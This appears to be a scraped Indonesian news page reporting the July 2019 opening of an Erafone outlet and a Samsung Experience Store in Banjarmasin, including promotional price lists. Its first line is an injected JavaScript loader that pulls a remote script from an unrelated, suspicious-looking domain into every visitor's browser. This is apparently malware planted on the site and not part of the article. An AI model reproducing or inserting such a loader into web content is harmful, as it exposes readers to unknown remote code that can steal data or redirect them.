(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Bisnis

Erafone Megastore dan Samsung Experience Store by NASA Hadir di Banjarmasin


BANJARMASIN, PT Erafone Artha Retailindo (EAR) dan PT Nusa Abadi Sukses Artha (NASA), dua anak usaha Erajaya Group meresmikan outlet Erafone di Jalan Ahmad Yani Km 3 nomor 132, Banjarmasin dan Samsung Experience Store (SES) by NASA di Duta Mall Banjarmasin Lt 1, Sabtu (26/7).

Diresmikannya dua outlet baru tersebut, sampai saat ini total outlet yang dimiliki oleh Erajaya Retail Group di Banjarmasin kini menjadi sembilan outlet.

Djatmiko Wardoyo, Director Marketing and Communications Erajaya Group dalam press rilis kepada Kanalkalimantan.com, mengatakan, mengutamakan customer experience pada setiap outlet yang dihadirkan mewujudkan konsep tersebut, tersedia area experience, area purna jual, transaksi penjualan yang membuat outlet lebih nyaman dan menyenangkan bagi pengunjung. Erajaya Group berkomitmen merealisasikan upayanya dalam menghadirkan layanan dan pengalaman terbaik bagi para pelanggan, baik layanan penjualan maupun purna jual.

“Tema Big Celebration kali ini adalah peresmian serentak outlet Erafone dan SES di Banjarmasin yang merupakan bentuk komitmen Erajaya Group untuk selalu menyediakan dan memberikan pengalaman terbaik melalui jaringan retail group yang tersebar luas sehingga dapat lebih dekat lagi dengan pelanggan dimanapun berada.” ungkap Djatmiko Wardoyo.

Devina Paulus, Public Relations Erajaya Group menambahkan, Erafone merupakan sebuah retail selular multi-brand dengan konsep baru dan modern yang menggabungkan kelengkapan produk, solusi serta kenyamanan berbelanja secara terintegrasi. Sedangkan Samsung Experience Store by NASA mengutamakan total experience konsumen untuk mendapatkan smartphone dan ekosistem Samsung dengan konsep store yang nyaman dan menyenangkan bagi pelanggan.

Grand Opening Samsung Experience Store Duta Mall Banjarmasin.
Foto : istimewa

“Masing-masing store juga memiliki brand corner yang menawarkan jajaran produk unggulan terbarunya, semuanya dijamin original dan yang terpenting adalah bergaransi resmi,” ujar Devina Paulus.

Dalam rangka Grand Opening Erafone dan SES di Banjarmasin, para pengunjung akan dimanjakan dengan berbagai promo menarik dari tanggal 26-28 Juli 2019.

Erafone :

  • FLASH SALE! Pembelian gadget & aksesoris handphone mulai 19 ribu-an mulai jam 4-6 sore!
  • Potongan harga smartphone hingga 4,500,000
  • Lelang smartphone & aksesoris mulai dari seribu rupiah
  • Beli smartphone dapat hadiah langsung handphone, peralatan rumah tangga dan hadiah menarik lainnya

Samsung Experience Store by NASA :

  • Beli smartphone Samsung CASHBACK hingga 4,700,000
  • FLASH SALE gadget & aksesoris mulai 49,000
  • Harga spesial Samsung Galaxy S10 Series mulai dari 9,699,000
  • Harga spesial Samsung Galaxy A70 5,499,000

Untuk semua pembelanjaan di atas, dapatkan tambahan diskon 500 ribu dengan cicilan 0% hingga 24 bulan dengan kartu kredit BCA dan Mandiri. Nikmati juga cicilan 0% tanpa kertu kredit dengan Home Credit dan Megazip. Tentang PT Erajaya Swasembada Tbk. Berdiri pada tahun 1996, Erajaya menjalankan kegiatan usaha importir, distribusi dan perdagangan ritel perangkat telekomunikasi selular seperti telepon selular dan tablet, subscriber identity module card (SIM Card), voucher isi ulang operator jaringan selular, aksesoris, serta gadget dan produk Internet of Things (IoT) seperti drone, action camera, wearable devices, dan lain-lain.

Pada tahun 2011, Erajaya resmi menjadi perusahaan terbuka dan menjual sahamnya di Bursa Efek Indonesia, langkah tersebut menjadikan Erajaya sebagai perusahaan terbesar dan terpercaya dalam bisnisnya di Indonesia. (kk)

Reporter:KK
Editor:Bie

Desy Arfianty

Recent Posts

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

59 menit ago

Embarkasi Haji Banjarmasin Berangkatkan Kloter 1, 320 Jemaah Menuju Madinah

KANALKALIMANTAN.COM, BANJARBARU - Jemaah haji Kloter pertama diberangkatkan dari Asrama Haji Embarkasi Banjarmasin di Banjarbaru,… Read More

1 jam ago

Dilakban di Paha, Empat Orang di Bandara Juwata Tarakan Selundupkan 4 Kg Sabu

KANALKALIMANTAN.COM, TARAKAN - Empat orang calon penumpang pesawat dengan rute Tarakan-Makassar batal berangkat lantaran kedapatan… Read More

16 jam ago

Satgas TMMD Bikin Sumur Bor untuk Warga Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pengerjaan sumur bor menjadi salah satu sasaran fisik program TNI Manunggal Membangun… Read More

17 jam ago

Jemaah Termuda Kloter 1 Daftar Haji saat Umur 10 Tahun, Setor 2014 Berangkat 2024

KANALKALIMANTAN.COM, BANJARBARU - Berangkat haji ke Baitullah menunaikan Rukun Islam kelima sepenuhnya adalah panggilan. Berusia… Read More

20 jam ago

Embarkasi Banjarmasin Berangkatkan 5.759 JCH Kalsel-Kalteng, Pelayanan Penuh Jemaah Lansia

KANALKALIMANTAN.COM, BANJARBARU - Sebanyak 4.071 jemaah calon haji (JCH) asal Kalimantan Selatan (Kalsel) akan berangkat… Read More

21 jam ago

This website uses cookies.